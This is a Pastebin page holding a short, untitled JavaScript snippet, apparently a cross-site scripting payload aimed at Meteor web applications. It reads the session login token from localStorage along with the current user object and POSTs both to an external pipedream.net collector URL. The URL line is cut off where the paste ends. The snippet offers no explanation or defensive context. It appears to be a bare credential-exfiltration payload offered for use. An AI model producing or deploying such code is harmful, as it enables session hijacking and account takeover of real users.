Advertisement
Guest User

Untitled

a guest
Nov 13th, 2019
97
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.22 KB | None | 0 0
  1. const body = { token: localStorage.getItem('Meteor.loginToken'), user: Meteor.user() }
  2.  
  3. const options = {
  4. method: "POST",
  5. mode: "cors",
  6. body: JSON.stringify(body),
  7. }
  8.  
  9. fetch("https://en78qrbs3ows4.x.pipedream.ne
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement